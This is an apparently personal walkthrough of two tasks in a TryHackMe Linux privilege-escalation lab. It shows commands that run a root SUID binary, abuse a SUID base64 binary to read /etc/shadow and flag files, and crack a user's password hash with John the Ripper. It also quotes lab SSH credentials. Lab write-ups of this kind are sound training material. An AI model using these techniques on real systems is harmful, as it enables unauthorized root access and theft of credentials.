Here’s a write-up for Task 10 and 12 in Room https://tryhackme.com/room/linprivesc
The other tasks in the same room have intensive instructions which are relatively easy to follow. Task 10 was slightly more confusing. Task 12 is a challenge question with no instructions. Therefore I’ll only write for these tasks.
Task 10: Privilege Escalation: PATH
Q. What is the odd folder you have write access for?
Find the writable files/dirs and pipe the result to a file (which is easier to inspect later)
> find / -writable 2>/dev/null > /tmp/resultSkimming through the result, one directory stood out (/home/murdoch, the home directory of a rich guy).
Note that this directory will be useful for later questions too.
In the instructions for this task, it requires making a C file (path_exp.c). However, gcc is not installed on the machine, which makes the compilation difficult. Moreover, at this stage, the root privilege is not yet obtained. Even if you have the executable compiled, you won’t be able to chown to root and add a SUID bit for this exploit.
Here’s when Murdoch’s home is helpful. In /home/murdoch, there’s a binary file named ‘test’ owned by root with SUID set (which is the executable of path_exp.c).
$ ls -al /home/murdochtotal 32drwxrwxrwx 2 root root 4096 Oct 22 07:19 .drwxr-xr-x 5 root root 4096 Jun 20 2021 ..-rwsr-xr-x 1 root root 16712 Jun 20 2021 test-rw-rw-r-- 1 root root 86 Jun 20 2021 thm.py
Run ./test
$ ./testroot@ip-10-10-xx-xx:/home/murdoch#
and now you are root.
Q. What is the content of the flag6.txt file?
root@ip-10-10-xx-xx:/root# find / -name "flag6.txt" 2>/dev/null/home/matt/flag6.txt
Task 12 Capstone Challenge
By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.You can access the target machine over your browser or use the SSH credentials below.Username: leonard
Password: Penny123
Of course, Leonard would have used Penny’s name for password.
As usual, find the SUID executables
> find / -type f -perm -04000 -ls 2>/dev/nullCompare with https://gtfobins.github.io/ and both base64 and at could be exploitable.
What is the content of the flag2.txt file?
Check leonard’s bash history and you should see something like
15 cd rootflag/16 ls17 cat flag2.txt
Looks like I found flag2.txt before flag1.txt. Run the following (without >):
> LF='/home/rootflag/flag2.txt'
> base64 $LF | base64 --decodeWhat is the content of the flag1.txt file?
Using the same trick, we can check the shadow file.
> LF='/etc/shadow'
> base64 $LF | base64 --decodeYou will see root’s and missy’s shadow hash. Since I already have the rootflag, I just need to crack missy’s.
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::Save the hash between ‘missy:’ until the next immediate ‘:’
> echo $6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/ > missy-hash-fileThen use John the Ripper to enumerate the popular passwords:
> john --wordlist=/usr/share/wordlists/rockyou.txt -format=sha512crypt missy-hash-fileAfter obtaining missy’s password, you can become missy by
> su - missyThen find flag1.txt by
> find / -name "flag1.txt" 2>/dev/null
/home/missy/Documents/flag1.txt